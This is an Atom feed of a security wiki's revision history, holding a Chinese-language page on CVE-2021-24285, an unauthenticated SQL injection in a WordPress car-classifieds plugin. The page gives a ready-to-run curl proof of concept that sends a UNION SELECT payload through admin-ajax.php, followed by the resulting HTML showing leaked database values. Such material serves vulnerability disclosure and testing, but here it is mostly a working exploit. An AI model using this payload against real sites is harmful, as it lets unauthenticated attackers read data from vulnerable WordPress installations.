<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE%E2%80%8B%E2%80%8B-2021-24285_WordPress_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E</id>
	<title>CVE​​-2021-24285 WordPress SQL注入漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE%E2%80%8B%E2%80%8B-2021-24285_WordPress_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE%E2%80%8B%E2%80%8B-2021-24285_WordPress_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-10T00:06:55Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=CVE%E2%80%8B%E2%80%8B-2021-24285_WordPress_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&amp;diff=1910&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==簡介== 插件名稱：wp-plugin：cars-seller-auto-classifieds-script  受影響的版本：2.1.0（如果有，則可能是較低版本）  漏洞：注入  所需的最...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE%E2%80%8B%E2%80%8B-2021-24285_WordPress_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&amp;diff=1910&amp;oldid=prev"/>
		<updated>2021-04-28T03:15:48Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==簡介== 插件名稱：wp-plugin：cars-seller-auto-classifieds-script  受影響的版本：2.1.0（如果有，則可能是較低版本）  漏洞：注入  所需的最...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==簡介==&lt;br /&gt;
插件名稱：wp-plugin：cars-seller-auto-classifieds-script&lt;br /&gt;
&lt;br /&gt;
受影響的版本：2.1.0（如果有，則可能是較低版本）&lt;br /&gt;
&lt;br /&gt;
漏洞：注入&lt;br /&gt;
&lt;br /&gt;
所需的最低訪問級別：未認證&lt;br /&gt;
&lt;br /&gt;
==POC==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
curl 'http://&amp;lt;Hostname&amp;gt;/wp-admin/admin-ajax.php' \&lt;br /&gt;
  --data-raw 'action=request_list_request&amp;amp;order_id=-1662 UNION ALL SELECT NULL,NULL,current_user(),current_user(),current_user(),NULL,current_user(),current_user(),NULL-- -' \&lt;br /&gt;
  --compressed \&lt;br /&gt;
  --insecure&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
     &amp;lt;h1&amp;gt;Request Details&amp;lt;/h1&amp;gt;&lt;br /&gt;
        &amp;lt;table style=&amp;quot; border: 1px solid #999;width:96%&amp;quot; class=&amp;quot;order_detail&amp;quot;&amp;gt;&lt;br /&gt;
            &amp;lt;tr&amp;gt;&lt;br /&gt;
                &amp;lt;td&amp;gt;Request Id&amp;lt;/td&amp;gt;&amp;lt;td&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
            &amp;lt;/tr&amp;gt;&lt;br /&gt;
            &amp;lt;tr&amp;gt;&lt;br /&gt;
                &amp;lt;td&amp;gt;Car Title&amp;lt;/td&amp;gt;&amp;lt;td&amp;gt;Untitled&amp;lt;/td&amp;gt;&lt;br /&gt;
            &amp;lt;/tr&amp;gt;&lt;br /&gt;
            &amp;lt;tr&amp;gt;&lt;br /&gt;
                &amp;lt;td&amp;gt;Name&amp;lt;/td&amp;gt;&amp;lt;td&amp;gt;bob@localhost bob@localhost&amp;lt;/td&amp;gt;&lt;br /&gt;
            &amp;lt;/tr&amp;gt;&lt;br /&gt;
            &amp;lt;tr&amp;gt;&lt;br /&gt;
                &amp;lt;td&amp;gt;Email&amp;lt;/td&amp;gt;&amp;lt;td&amp;gt;bob@localhost&amp;lt;/td&amp;gt;&lt;br /&gt;
            &amp;lt;/tr&amp;gt;&lt;br /&gt;
            &amp;lt;tr&amp;gt;&lt;br /&gt;
                &amp;lt;td&amp;gt;Phone&amp;lt;/td&amp;gt;&amp;lt;td&amp;gt;bob@localhost&amp;lt;/td&amp;gt;&lt;br /&gt;
            &amp;lt;/tr&amp;gt;&lt;br /&gt;
            &amp;lt;tr&amp;gt;&lt;br /&gt;
                &amp;lt;td&amp;gt;Message&amp;lt;/td&amp;gt;&amp;lt;td&amp;gt;bob@localhost&amp;lt;/td&amp;gt;&lt;br /&gt;
            &amp;lt;/tr&amp;gt;&lt;br /&gt;
            &amp;lt;tr&amp;gt;&lt;br /&gt;
                &amp;lt;td colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;&amp;gt;&amp;lt;a href=&amp;quot;mailto:bob@localhost&amp;quot; style=&amp;quot;background: #2ea2cc;border-color: #0074a2;-webkit-box-shadow: inset 0 1px 0 rgba(120,200,230,.5),0 1px 0 rgba(0,0,0,.15);box-shadow: inset 0 1px 0 rgba(120,200,230,.5),0 1px 0 rgba(0,0,0,.15);color: #fff;text-decoration: none;vertical-align: baseline;display: inline-block;text-decoration: none;font-size: 13px;line-height: 26px;height: 28px;margin: 0;padding: 0 10px 1px;cursor: pointer;border-width: 1px;&lt;br /&gt;
border-style: solid;-webkit-appearance: none;-webkit-border-radius: 3px;border-radius: 3px;white-space: nowrap;-webkit-box-sizing: border-box;-moz-box-sizing: border-box;box-sizing: border-box;&amp;quot;&amp;gt;Reply&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
&lt;br /&gt;
            &amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
        &amp;lt;/table&amp;gt;&lt;br /&gt;
        &amp;lt;p style=&amp;quot;margin-top:20px; text-align:right;&amp;quot;&amp;gt;&amp;lt;a href=&amp;quot;#&amp;quot; id=&amp;quot;close&amp;quot;&amp;gt;Close&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>